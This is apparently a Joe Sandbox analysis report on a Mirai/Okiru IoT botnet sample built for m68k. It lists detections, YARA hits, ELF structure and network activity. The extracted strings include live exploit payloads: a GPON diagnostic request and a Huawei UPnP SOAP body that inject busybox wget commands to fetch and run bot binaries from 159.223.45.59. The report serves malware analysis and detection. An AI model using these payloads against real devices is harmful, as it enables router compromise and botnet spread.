Edit tour

Linux Analysis Report
Yboats.m68k.elf

Overview

General Information

Sample name:Yboats.m68k.elf
Analysis ID:1594274
MD5:7dee212cd055d7c3849195f3fd355f1b
SHA1:57861cafc8b7d5d2be061b760454ed8182b034ba
SHA256:49fd75cc934618bbe1ecd94c4eb2d65089cb79ca2be387aa87de24fe350a98c5
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1594274
Start date and time:2025-01-18 18:01:21 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Yboats.m68k.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/0@2/0
  • VT rate limit hit for: http://159.223.45.59/Yboats.arm7;chmod
  • VT rate limit hit for: http://159.223.45.59/Yboats.x86
  • VT rate limit hit for: http://159.223.45.59/adb;
  • VT rate limit hit for: http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
  • VT rate limit hit for: http://159.223.45.59/gpon443
Command:/tmp/Yboats.m68k.elf
PID:5531
Exit Code:136
Exit Code Info:SIGFPE (8) Floating-point exception
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 8 (Floating point exception) - core dumped
  • system is lnxubuntu20
  • Yboats.m68k.elf (PID: 5531, Parent: 5452, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/Yboats.m68k.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Yboats.m68k.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    Yboats.m68k.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Yboats.m68k.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        Yboats.m68k.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Yboats.m68k.elfMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
          • 0x1d254:$x2: /bin/busybox chmod 777 * /tmp/
          • 0x1cfbf:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          SourceRuleDescriptionAuthorStrings
          5531.1.00007f543c001000.00007f543c021000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5531.1.00007f543c001000.00007f543c021000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              5531.1.00007f543c001000.00007f543c021000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                5531.1.00007f543c001000.00007f543c021000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  5531.1.00007f543c001000.00007f543c021000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
                  • 0x1d254:$x2: /bin/busybox chmod 777 * /tmp/
                  • 0x1cfbf:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                  Click to see the 4 entries
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Yboats.m68k.elfAvira: detected
                  Source: Yboats.m68k.elfVirustotal: Detection: 63%Perma Link
                  Source: Yboats.m68k.elfReversingLabs: Detection: 65%
                  Source: /tmp/Yboats.m68k.elf (PID: 5531)Socket: 127.0.0.1:39148Jump to behavior
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/Yboats.arm7;chmod
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/Yboats.mips
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/Yboats.mips;
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/Yboats.mpsl;chmod
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/Yboats.x86
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/adb;
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
                  Source: Yboats.m68k.elfString found in binary or memory: http://159.223.45.59/gpon443
                  Source: Yboats.m68k.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                  Source: Yboats.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: Yboats.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                  System Summary

                  barindex
                  Source: Yboats.m68k.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
                  Source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
                  Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://159.223.45.59/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 159.223.45.59 -l /tmp/.ybot -r Yboats.mips; /bin/busybox chmod 777 * /tmp/.ybot; /tmp/.ybot huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://159.223.45.59/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /HNAP1/ HTTP/1.0
                  Source: Initial sampleString containing 'busybox' found: var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/SofiasshdbashhttpdtelnetddropbearencodersystemYbot/root/dvr_gui//root/dvr_app//anko-app//opt/,
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: Yboats.m68k.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
                  Source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
                  Source: classification engineClassification label: mal100.troj.evad.linELF@0/0@2/0

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: /tmp/Yboats.m68k.elf (PID: 5531)File: /tmp/Yboats.m68k.elfJump to behavior
                  Source: /tmp/Yboats.m68k.elf (PID: 5531)Queries kernel information via 'uname': Jump to behavior
                  Source: Yboats.m68k.elf, 5531.1.000055c4c6e4a000.000055c4c6ecf000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
                  Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
                  Source: Yboats.m68k.elf, 5531.1.000055c4c6e4a000.000055c4c6ecf000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
                  Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 8 (Floating point exception) - core dumped
                  Source: Yboats.m68k.elf, 5531.1.00007fff779ff000.00007fff77a20000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/Yboats.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Yboats.m68k.elf

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Yboats.m68k.elf, type: SAMPLE
                  Source: Yara matchFile source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR
                  Source: Yara matchFile source: Yboats.m68k.elf, type: SAMPLE
                  Source: Yara matchFile source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Yboats.m68k.elf, type: SAMPLE
                  Source: Yara matchFile source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR
                  Source: Yara matchFile source: Yboats.m68k.elf, type: SAMPLE
                  Source: Yara matchFile source: 5531.1.00007f543c001000.00007f543c021000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Yboats.m68k.elf PID: 5531, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
                  File Deletion
                  OS Credential Dumping11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Non-Application Layer Protocol
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1594274 Sample: Yboats.m68k.elf Startdate: 18/01/2025 Architecture: LINUX Score: 100 9 daisy.ubuntu.com 2->9 11 Malicious sample detected (through community Yara rule) 2->11 13 Antivirus / Scanner detection for submitted sample 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 2 other signatures 2->17 6 Yboats.m68k.elf 2->6         started        signatures3 process4 signatures5 19 Sample deletes itself 6->19
                  SourceDetectionScannerLabelLink
                  Yboats.m68k.elf63%VirustotalBrowse
                  Yboats.m68k.elf66%ReversingLabsLinux.Trojan.Mirai
                  Yboats.m68k.elf100%AviraEXP/ELF.Mirai.Hua.c
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches

                  Download Network PCAP: filteredfull

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.25
                  truefalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://159.223.45.59/gpon443Yboats.m68k.elffalse
                      unknown
                      http://159.223.45.59/Yboats.arm7;chmodYboats.m68k.elffalse
                        unknown
                        http://159.223.45.59/adb;Yboats.m68k.elffalse
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/Yboats.m68k.elffalse
                            high
                            http://159.223.45.59/Yboats.x86Yboats.m68k.elffalse
                              unknown
                              http://159.223.45.59/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114Yboats.m68k.elffalse
                                unknown
                                http://159.223.45.59/Yboats.mpsl;chmodYboats.m68k.elffalse
                                  unknown
                                  http://purenetworks.com/HNAP1/Yboats.m68k.elffalse
                                    high
                                    http://159.223.45.59/Yboats.mipsYboats.m68k.elffalse
                                      unknown
                                      http://159.223.45.59/Yboats.mips;Yboats.m68k.elffalse
                                        unknown
                                        http://schemas.xmlsoap.org/soap/envelope/Yboats.m68k.elffalse
                                          high
                                          No contacted IP infos
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          daisy.ubuntu.comYboats.arm.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          Yboats.mips.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          loki.arm6.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          dbg.x86.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          I586.elfGet hashmaliciousMiraiBrowse
                                          • 162.213.35.24
                                          ARMV4L.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          ARMV6L.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          MIPSEL.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.25
                                          ARMV5L.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          sshd.elfGet hashmaliciousUnknownBrowse
                                          • 162.213.35.24
                                          No context
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.498627791579188
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:Yboats.m68k.elf
                                          File size:131'636 bytes
                                          MD5:7dee212cd055d7c3849195f3fd355f1b
                                          SHA1:57861cafc8b7d5d2be061b760454ed8182b034ba
                                          SHA256:49fd75cc934618bbe1ecd94c4eb2d65089cb79ca2be387aa87de24fe350a98c5
                                          SHA512:f40a2628105c681cf4a401e0ed58a65f18eb8cd505cf5608e462815aef04207ae4fe775281c64fce5dd6b13bd99dcc88e8a8fc002a65b96968c7918e5a347228
                                          SSDEEP:3072:969vqDQz5/MgP8EnYwyIp4kz4IFGOLutHPvpzgEdJFc:0vqDQz5/MgP8EYZC4A7GOQPvpTdvc
                                          TLSH:2ED36D97B4019E3DF85ED27A81374A0DF021925866A2072BF367BC9BBC730A45F1EE45
                                          File Content Preview:.ELF.......................D...4.........4. ...(.................................. .......................+....... .dt.Q............................NV..a....da.....N^NuNV..J9.. df>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy....N.X....... dN^NuNV..N^NuN

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, big endian
                                          Version:1 (current)
                                          Machine:MC68000
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x80000144
                                          Flags:0x0
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:3
                                          Section Header Offset:131236
                                          Section Header Size:40
                                          Number of Section Headers:10
                                          Header String Table Index:9
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x800000940x940x140x00x6AX002
                                          .textPROGBITS0x800000a80xa80x1c6060x00x6AX004
                                          .finiPROGBITS0x8001c6ae0x1c6ae0xe0x00x6AX002
                                          .rodataPROGBITS0x8001c6bc0x1c6bc0x35240x00x2A002
                                          .ctorsPROGBITS0x80021be40x1fbe40x80x00x3WA004
                                          .dtorsPROGBITS0x80021bec0x1fbec0x80x00x3WA004
                                          .dataPROGBITS0x80021bf80x1fbf80x46c0x00x3WA004
                                          .bssNOBITS0x800220640x200640x26880x00x3WA004
                                          .shstrtabSTRTAB0x00x200640x3e0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x800000000x800000000x1fbe00x1fbe06.51810x5R E0x2000.init .text .fini .rodata
                                          LOAD0x1fbe40x80021be40x80021be40x4800x2b083.57560x6RW 0x2000.ctors .dtors .data .bss
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                          Download Network PCAP: filteredfull

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 18, 2025 18:02:13.478430986 CET3701653192.168.2.158.8.8.8
                                          Jan 18, 2025 18:02:13.478430986 CET5716753192.168.2.158.8.8.8
                                          Jan 18, 2025 18:02:13.485377073 CET53370168.8.8.8192.168.2.15
                                          Jan 18, 2025 18:02:13.485435963 CET53571678.8.8.8192.168.2.15
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 18, 2025 18:02:13.478430986 CET192.168.2.158.8.8.80xdb6eStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                          Jan 18, 2025 18:02:13.478430986 CET192.168.2.158.8.8.80xeb09Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 18, 2025 18:02:13.485377073 CET8.8.8.8192.168.2.150xdb6eNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                          Jan 18, 2025 18:02:13.485377073 CET8.8.8.8192.168.2.150xdb6eNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                          System Behavior

                                          Start time (UTC):17:02:11
                                          Start date (UTC):18/01/2025
                                          Path:/tmp/Yboats.m68k.elf
                                          Arguments:/tmp/Yboats.m68k.elf
                                          File size:4463432 bytes
                                          MD5 hash:cd177594338c77b895ae27c33f8f86cc